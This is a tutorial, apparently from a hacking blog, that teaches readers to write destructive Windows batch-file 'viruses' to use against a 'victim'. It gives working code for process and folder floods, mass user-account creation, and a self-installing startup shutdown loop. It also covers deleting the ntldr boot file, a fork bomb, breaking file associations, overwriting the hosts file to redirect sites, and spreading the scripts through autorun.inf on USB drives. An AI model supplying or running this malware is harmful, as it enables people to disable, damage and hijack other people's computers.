Batch Files -The Arts Of Creating Viruses

I could just you give the codes to paste in
notepad and ask you to save files with
extension .bat and your deadly batch
viruses would be ready. But instead of that,
I have focused on making the basics of
batch files clear and developing the
approach to code your own viruses.
What are Batch Files ?
Lets begin with a simple example , Open
your command prompt and change your
current directory to 'desktop' by typing 'cd
desktop' without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory
'x'
We first make a folder/directory 'x', then
enter in folder 'x',then make a folder 'y' in
folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way.
Copy these three commands in notepad
and save file as anything.bat
Now just double click on this batch file and
the same work would be done , You will get
a folder 'x' on your desktop and folder 'y' in
it. This means the three commands executed
line by line when we ran the batch file
So a batch file is simply a text containing
series of commands which are executed
automatically line by line when the batch
file is run.
What can batch viruses do ?
They can be used to delete the windows
files,format data,steal information,irritate
victim, consume CPU resources to affect
performance,disable firewalls,open
ports,modify or destroy registry and for
many more purposes.
Now lets start with simple codes, Just
copy the code to notepad and save it as
anything.bat (I am anything you wish but
extension must be bat and save it as 'all
files' instead of text files).
Note: Type 'help' in command prompt to know
about some basic commands and to know
about using a particular command , type
'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the
commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open
different applications like
paint,notepad,command prompt repeatedly,
irritating victim and of course affecting
performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would
generate a positive no. randomly. So this
code would make start creating folders
whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user
account
goto x
This code would start creating windows
user accounts whose names could be any
random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and
Settings\Administrator\Start Menu\Programs
\Startup”
copy anything.bat “C:\Documents and
Settings\All Users\Start Menu\Programs
\Startup” //these two commands will copy
the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the
computer in 0 seconds
Note : Files in Start up folder gets started
automatically when windows starts . You
should first two lines of code in every virus
code so that it would copy itself in startup
folder. Start up folder path in Windows 7 is
C:\Users\sys\AppData\Roaming\Microsoft
\Windows\Start Menu\Programs\Startup
Everytime the victim would start the
computer, the batch file in start up would
run and shutdown the computer
immediately. You can remove this virus by
booting the computer in Safe Mode and
deleting the batch file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder
Option->View
Now Uncheck the option 'Hide operating
system files' and check option 'Show hidden
files and folders'. Click apply
Now you can see the operating system files.
There is a one file 'ntldr' which is boot
loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and
the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear
system file attribute, read only attribute ,
hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will
not reboot and a normal victim would
definitely install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe
percentage zero
This code creates a large number of
processes very quickly in order to saturate
the process table of windows. It will just
hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command
associates extension .txt with filetype
anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype
like extension ‘exe’ is  is associated with
filetype ‘exefile’. To see them, just enter
command ‘assoc’ in command prompt.
Above code changes the association of some
extensions to filetype ‘anything’ (means u
can write anything) which obviously
doesn’t exist. So all exe
(paint,games,command prompt and many
more),jpeg,png,mpeg files wudn’t open
properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:
\windows\system32\drivers\etc. We can
place a website and an IP in front of it. By
doing this, we want our web browser to
take us to host located at that IP when that
website name would be entered. I mean
request to resolve IP of website is not sent to
Domain Name Server(DNS) if the name of
website in hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com >
C:\windows\system32\drivers\etc\hosts //
this command prints or add xxx.xxx.xxx.xxx.
www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx  and
www.anything.com with IP address and
website of your choice. You can take/
redirect victim to any host located at
specific IP when he would try to log on to
specific website or u can simply block any
website by entering its name and any
invalid IP address.
.
Spreading batch viruses through pen
drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your
actual batch virus ‘anything.bat’ in
pendrive .When the victim would plug in
pen drive,the autorun.inf will launch
anything.bat and commands in batch file
virus would execute.